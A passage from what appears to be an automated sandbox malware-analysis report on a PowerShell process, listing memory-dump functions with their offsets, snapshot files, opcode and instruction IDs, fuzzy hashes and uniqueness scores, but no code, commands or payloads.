                                              • Opcode Fuzzy Hash: db1f7a0275710b5592e757ac464ba7885505369f71cea8e875570c749879f08b
                                              • Instruction Fuzzy Hash: A201A770B412556BE7108B68DC11FBFBFB69B85B11F14407AEA186B2C1CBB15905C7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FB5E8 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 913be647cf4d872e9b223bfcce87cb94f9cb04a3c0f21ead1cf60df994ac5c19
                                              • Instruction ID: 4dcd80f606f0357ef5778bf86cf3d8d280d707771b998526da0a1fc9b1719f57
                                              • Opcode Fuzzy Hash: 913be647cf4d872e9b223bfcce87cb94f9cb04a3c0f21ead1cf60df994ac5c19
                                              • Instruction Fuzzy Hash: D201F770B412146BE7108758DC10FBFBFA5AB85B11F24407AE6086B2C1CBB46901C7E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A9E68 Relevance: .0, Instructions: 44COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c56c70ed039c47b6f34c29a9b7fc55885aaafe3f84afa67235322a00121edaa0
                                              • Instruction ID: 47bb775f2650954e88ffca29d3746c141b320c76a092419a5550987300b467bf
                                              • Opcode Fuzzy Hash: c56c70ed039c47b6f34c29a9b7fc55885aaafe3f84afa67235322a00121edaa0
                                              • Instruction Fuzzy Hash: DD017131200B159FD714EF69D844B6AFBE5FF84225F00862DD41993B40DBB4E855CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A5078 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c692537b272cce155e4a00565c623cfed7e6de3256dd2ef5265a74e2e9cdd0de
                                              • Instruction ID: 403d77b02c1f338e4e6eb2a128547d55f82cc177ff3cc30a80c0f01d059e2390
                                              • Opcode Fuzzy Hash: c692537b272cce155e4a00565c623cfed7e6de3256dd2ef5265a74e2e9cdd0de
                                              • Instruction Fuzzy Hash: 14016D71B003199F8B40EFADC840AAEBBF9EBC9251710853AE858D7301E7719A01CBE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EF9C0 Relevance: .0, Instructions: 43COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f543cb6c231dff057acebbdec863068d8ea8a97d7028e81e8a73a40d6494430
                                              • Instruction ID: fbbca33b19f3161671a3ed5ade150c084835664daab32982275510726bdbcc4b
                                              • Opcode Fuzzy Hash: 2f543cb6c231dff057acebbdec863068d8ea8a97d7028e81e8a73a40d6494430
                                              • Instruction Fuzzy Hash: 290181752042586F9B05EF59D880D6BBFE9EF8A26070980AAFD08CB352CA31DC01C7A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A514F Relevance: .0, Instructions: 41COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee34a7bd27dfa9a8ff9bfdc3d75cb21b4f8faf4bf79e9cd4ff206db5c14dc61b
                                              • Instruction ID: 9b168e973c09b6243aee8be13663b798f71ba09f311cbd07d6209f8253064de6
                                              • Opcode Fuzzy Hash: ee34a7bd27dfa9a8ff9bfdc3d75cb21b4f8faf4bf79e9cd4ff206db5c14dc61b
                                              • Instruction Fuzzy Hash: B8F09636704304BF9B158E5AD8409A6BFADEFC5262305806BE848C7311D7319C01C7B0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F7A80 Relevance: .0, Instructions: 39COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d9e837cbd4431c6bc7e603f30a48e7581950af615e9399b3ed86de957338f950
                                              • Instruction ID: 156e525ee750d39422b8e6f7e1dc71123efec5d30047a6374b4a8d6e2ad193b6
                                              • Opcode Fuzzy Hash: d9e837cbd4431c6bc7e603f30a48e7581950af615e9399b3ed86de957338f950
                                              • Instruction Fuzzy Hash: DCF0F6357082546FDB0197A8E8449FEBFA5EFC6320B18405EE005DB262CA704C45C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A5088 Relevance: .0, Instructions: 38COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 992381e9967ab7fbb30fa53d660f4a15eb81aeb9d026b407e53561967b96f181
                                              • Instruction ID: ed0e6a44e345e280ffa621a8c1dec7aee5347b9312ce91610f545fa72ba2a8fa
                                              • Opcode Fuzzy Hash: 992381e9967ab7fbb30fa53d660f4a15eb81aeb9d026b407e53561967b96f181
                                              • Instruction Fuzzy Hash: AEF01875B002199F8B40DFADC84069FBBF9EBCC251710842AE918D7301E77199018BD0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EF440 Relevance: .0, Instructions: 37COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 561d2ee44884bbe222f513c2a0b042d2e797212dcb233e241946d39f8c7b9e22
                                              • Instruction ID: a1f59cd07572a04d9239ad7210fbf91863b626d316b3e86a81939f3cbed161bb
                                              • Opcode Fuzzy Hash: 561d2ee44884bbe222f513c2a0b042d2e797212dcb233e241946d39f8c7b9e22
                                              • Instruction Fuzzy Hash: 79F0E236B0015247D715DA29A4404DAFBCFABC512130EC2BBC90DCBB00DD74D806CBD0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F15E8 Relevance: .0, Instructions: 35COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd7ef0049c2de20e4886c3dcac76bc7bdfe0025215a1fa33dbe961103a806479
                                              • Instruction ID: 7f82fb1a42cfa40d18fadacb74ffc2af8e7c6ba0693ccd5a69852e952ae790cb
                                              • Opcode Fuzzy Hash: fd7ef0049c2de20e4886c3dcac76bc7bdfe0025215a1fa33dbe961103a806479
                                              • Instruction Fuzzy Hash: F8F0A022301A2197E61655B9B8207AF7ACEDBC0B63F44013ADA09D7691DF29D90253E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F21C2 Relevance: .0, Instructions: 33COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f1e22ea154aa43b0fb4e82c1edbfa66837d8a91001ec3f3d0bd78f1e8c5320a
                                              • Instruction ID: a509d37f62452371bf567c1b563d930d01cad8c17f4ee10f9219b5423bdb1493
                                              • Opcode Fuzzy Hash: 7f1e22ea154aa43b0fb4e82c1edbfa66837d8a91001ec3f3d0bd78f1e8c5320a
                                              • Instruction Fuzzy Hash: CFF0AE312053905FE701D7B9E8546D9BFA6FFC6261B4845BAD008DB171CB71ED0983A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083AF781 Relevance: .0, Instructions: 32COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83cc626e149427f51ef65fb706ee8a259684360531cb7a392bdd5b0253e800be
                                              • Instruction ID: 508f121d2fb45200dc984abfa01e493eadbfe92c89e400d04aff1b0fac698410
                                              • Opcode Fuzzy Hash: 83cc626e149427f51ef65fb706ee8a259684360531cb7a392bdd5b0253e800be
                                              • Instruction Fuzzy Hash: 6FF01233605249AFCF028F65AC058EF3FA6DB8A22170480AAF958D6262D6358925DB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F15D7 Relevance: .0, Instructions: 31COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f59e160d84f01b02f8d99a54ded3fc5339f16a8f7d626df1f399c51bbba43a8
                                              • Instruction ID: 189442f1cdf23bb82012d5f1d180de1654de6ece98b39894c35c728617434538
                                              • Opcode Fuzzy Hash: 6f59e160d84f01b02f8d99a54ded3fc5339f16a8f7d626df1f399c51bbba43a8
                                              • Instruction Fuzzy Hash: 15F0A0126497E2CAD7230229A91079E3F54CB82223F0D09FF9A8ACB5D3D608C41687E2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FE47A Relevance: .0, Instructions: 29COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e6eb9ffbf028fc3736b85d0eb0f90bfcd692f91395292e38a8f98aeb760f3aa0
                                              • Instruction ID: 53ed84c970e642456e93eac86ff31a77f15be4130bd637798450656e64f41c2b
                                              • Opcode Fuzzy Hash: e6eb9ffbf028fc3736b85d0eb0f90bfcd692f91395292e38a8f98aeb760f3aa0
                                              • Instruction Fuzzy Hash: 8CF065755092956FD7128B69D944CA7FF7CFA8622030942DAE888DB213C221AC85C7B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F21D0 Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11d735ea0473e8bf5a1520cf5329535defc8cb802a09718f6d48dbfffb894ff6
                                              • Instruction ID: d31bf3350e339572444c0fa26c4544e642cab290dcfd14b772c327051ddbe6f9
                                              • Opcode Fuzzy Hash: 11d735ea0473e8bf5a1520cf5329535defc8cb802a09718f6d48dbfffb894ff6
                                              • Instruction Fuzzy Hash: 01E092312002106BE704E6AAE844A9AB7DEFFC5265F448579E10CC7210DF61EC0583F5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089ED2F4 Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 419cb5519d356eb8f6875db4847388752614c325073aed06d2443a6112268a75
                                              • Instruction ID: a9a4423823804eb87944cb2a1521a2b780da46027007a9c7b8416b391ba67765
                                              • Opcode Fuzzy Hash: 419cb5519d356eb8f6875db4847388752614c325073aed06d2443a6112268a75
                                              • Instruction Fuzzy Hash: B7F01470A00605CFD728EF29C544A9AFBF2FF8C315F20C568E406AB660CB31A905CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EB550 Relevance: .0, Instructions: 28COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 077f6871491956af46816c2e0ebc3353f3c63236961baf44259bc2da5cc02caa
                                              • Instruction ID: 48ff581d51371aa074dc659e3788471213916412b1f9c85cd59e14b1e3d20cd1
                                              • Opcode Fuzzy Hash: 077f6871491956af46816c2e0ebc3353f3c63236961baf44259bc2da5cc02caa
                                              • Instruction Fuzzy Hash: FCF0A072500B05ABD311DB59E804B86FFA4FF88721F10C22AE148CB681DBB0E991C7D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083AF790 Relevance: .0, Instructions: 27COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 589a415627dca27240b664a69c5c8981b1d457235c6aed3415d55b86656f0589
                                              • Instruction ID: faa2c3de8dc2585c6cc0b6e27d80be147a416af62ef0ac9970a12c67ac6c9f04
                                              • Opcode Fuzzy Hash: 589a415627dca27240b664a69c5c8981b1d457235c6aed3415d55b86656f0589
                                              • Instruction Fuzzy Hash: 6FE0123360011DBF8F059E95AC04CEF7FAEEBC92717048029F918D2250DB318921DBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EB929 Relevance: .0, Instructions: 26COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 83aa2865589cf16ba4059a1ed0941cfc083719ee074f86d444cc281d25dfa76f
                                              • Instruction ID: 346429c1967c9bef08ea8c5cc3880412deadc18fbd82d73c235dae27f1f6407e
                                              • Opcode Fuzzy Hash: 83aa2865589cf16ba4059a1ed0941cfc083719ee074f86d444cc281d25dfa76f
                                              • Instruction Fuzzy Hash: 54E0483150B3D15FC713523C64148A67FAC5D8B17A31D01AEE845DB152C5B98805C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E62E0 Relevance: .0, Instructions: 24COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5df911b3dc30cbeef6747a19976137df67f0167749ffa6e3190ede57e682a966
                                              • Instruction ID: b07c3e4069994aa256af3b4b198bb04e240b44109add9bc5c5adecf1aed723aa
                                              • Opcode Fuzzy Hash: 5df911b3dc30cbeef6747a19976137df67f0167749ffa6e3190ede57e682a966
                                              • Instruction Fuzzy Hash: 43D01236704524574215D69DF95086EF79DDBC5635318807FE90DC7301DE62DC07D6D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FE488 Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c82add2c573349d14891d91286c28a657bbd5307d905a9469ee6b376768b5bdb
                                              • Instruction ID: 623663a592132448b1b5c41f35500bd17d404fce6f3a2977cf5d9166e6956ab1
                                              • Opcode Fuzzy Hash: c82add2c573349d14891d91286c28a657bbd5307d905a9469ee6b376768b5bdb
                                              • Instruction Fuzzy Hash: 6AE0ECB6A04119AF96108E45EC48C57FFACFB896743154296F90897302C731EC81CBF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E62DB Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 81767225a44abe4784bfa0f5adc6be66a7589b98e4e9b718283a93572d77df3a
                                              • Instruction ID: 97199151b5e1b055b705d873861fb6a2e3bcb9f8c7703ffd7f6d469ef4b68526
                                              • Opcode Fuzzy Hash: 81767225a44abe4784bfa0f5adc6be66a7589b98e4e9b718283a93572d77df3a
                                              • Instruction Fuzzy Hash: 6AD0C2317010105B4315C65CE4848AEBFA9DBCA720318816EE80DC7301CA628C03D680
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FB5B0 Relevance: .0, Instructions: 20COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d41466909fe0526003c73118e5c5570bb970bf8df2e234e98e1d4ea1aa62246
                                              • Instruction ID: f3a8795651332ddc7bf607df50072404223ec3181b6e39ba80f2109e14c6df71
                                              • Opcode Fuzzy Hash: 8d41466909fe0526003c73118e5c5570bb970bf8df2e234e98e1d4ea1aa62246
                                              • Instruction Fuzzy Hash: 98D05ED264E2D01BC742A6B4B4190F22F759D8713131944DBE0E5CE053C008840B8371
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089BFF90 Relevance: .0, Instructions: 18COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093096181.00000000089B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd7a9f5c2193fd741bc4b53050a2e74661fdfd42cccba4f8265a276d2e5121f3
                                              • Instruction ID: 02ba92994fefcaf1e5e12fe73689a6f9a5a80eb699db5a9e42d988d412016030
                                              • Opcode Fuzzy Hash: bd7a9f5c2193fd741bc4b53050a2e74661fdfd42cccba4f8265a276d2e5121f3
                                              • Instruction Fuzzy Hash: 25D05B312017158BE720B6B5EC007DBB3CDAF45315F40D92DD1DE47240DE75A80547D2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EB811 Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 99762b0ced74ce5001105e135cda1c367364d3d85ecdb43a944d0bb9b05bdd73
                                              • Instruction ID: c540f50b2be7e19b6d7ed625d1e5a0bd4e63a546f6db63b5c28bf80ac0186c5f
                                              • Opcode Fuzzy Hash: 99762b0ced74ce5001105e135cda1c367364d3d85ecdb43a944d0bb9b05bdd73
                                              • Instruction Fuzzy Hash: 9DD0C95065A3E58ECB079A7A6C14D163FE46A4311234D44EAE880DF2A7D72CD80AD761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F896F Relevance: .0, Instructions: 13COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ec588a89a68d2935bd96b62eb0df2472284a7928a9e89a45c6737bf3150aa82
                                              • Instruction ID: 503fd9bc2c644388f0efaf5a268b3142d969347f802b275a22d96c0c099bd545
                                              • Opcode Fuzzy Hash: 0ec588a89a68d2935bd96b62eb0df2472284a7928a9e89a45c6737bf3150aa82
                                              • Instruction Fuzzy Hash: 8BC012D381EAC09FC302162088A82E06F70EDA320834F80C381E1CA1A3D8188807C634
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E52C8 Relevance: .0, Instructions: 13COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8433f94adb6d819fa923eeec922f856888326189a9a5723da541120c3f9dd3b2
                                              • Instruction ID: 7bde40a08758cff35f57a1b7f7138d80fd8e4038e1720872ebd05ad7e46d28ee
                                              • Opcode Fuzzy Hash: 8433f94adb6d819fa923eeec922f856888326189a9a5723da541120c3f9dd3b2
                                              • Instruction Fuzzy Hash: 1AD0C9302002048FD75ADA5A9449762379AAB8431EF69C06CF40886752DBB2D896CE55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083FE24A Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b3fedecb5bf44c00d07f5460c12d5e0fba39d9a6013554423a449d842c94777
                                              • Instruction ID: 0736ffcaf38215c20d57ce182ff98797e09c1db6a9229340f335f63b6be6a691
                                              • Opcode Fuzzy Hash: 6b3fedecb5bf44c00d07f5460c12d5e0fba39d9a6013554423a449d842c94777
                                              • Instruction Fuzzy Hash: 56C04CA4409BC06FDB87CB64898504A7F70EA4311479AD0DAC899CF167D618AD5BC763
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089EE283 Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3543594cefebbad7f357d94d4ca891486bb79a0d67da2a61fdfd292c73342e8f
                                              • Instruction ID: 377b2fd24365bbd2a16e1748282028fe8dad771bf335353726f4cb619300dc2b
                                              • Opcode Fuzzy Hash: 3543594cefebbad7f357d94d4ca891486bb79a0d67da2a61fdfd292c73342e8f
                                              • Instruction Fuzzy Hash: C2C0023A640014CF8705DE99E545CDCBBB4EF98362B5104A6F6019B631C731ED65CA64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 08352220 Relevance: 8.3, Strings: 6, Instructions: 824COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #j^$3j^$Cj^$Sj^$cj^$sj^
                                              • API String ID: 0-2819466317
                                              • Opcode ID: eb09414e51ced8c84dc42feb287e98aff4e8aceeb93e212a029df46d895d17fc
                                              • Instruction ID: 1f7824d2f99f18ae90f981f552e3848f2a65a8ad07198af13a14740ca74ef17e
                                              • Opcode Fuzzy Hash: eb09414e51ced8c84dc42feb287e98aff4e8aceeb93e212a029df46d895d17fc
                                              • Instruction Fuzzy Hash: 28824934A002189FEB54DFA4DC50BEEB7B2EF89301F1045A9D509AB395DB35AE82CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083521F8 Relevance: 8.2, Strings: 6, Instructions: 716COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #j^$3j^$Cj^$Sj^$cj^$sj^
                                              • API String ID: 0-2819466317
                                              • Opcode ID: fe786f6753fdf0f71758fab2001bda41051ca5123dc4770d2ea6846821186721
                                              • Instruction ID: ac1623e3cede799d2d357bf2465b6f07d73096bf18da49e55862ad7512569369
                                              • Opcode Fuzzy Hash: fe786f6753fdf0f71758fab2001bda41051ca5123dc4770d2ea6846821186721
                                              • Instruction Fuzzy Hash: 0A622934A002189FEB54DBA4DC50BDE7BB2EF89301F1045A9D509AB3A5DF35AE82CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F2687 Relevance: 5.6, Strings: 1, Instructions: 4333COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: t(q
                                              • API String ID: 0-3080623236
                                              • Opcode ID: 4ae15071fa6919d9540c6894f5af3dd2a5d15e95c1b82a5ca469c1ff35b72ce0
                                              • Instruction ID: d03ea3b77e1477a818f4c3938271cd9061cb31f2a9a7ffa233c09f558251847c
                                              • Opcode Fuzzy Hash: 4ae15071fa6919d9540c6894f5af3dd2a5d15e95c1b82a5ca469c1ff35b72ce0
                                              • Instruction Fuzzy Hash: 25A3E974E012599FEB54DF64CC54BDEB7B2EB89300F0045E9910DAB294DB39AE82DF90
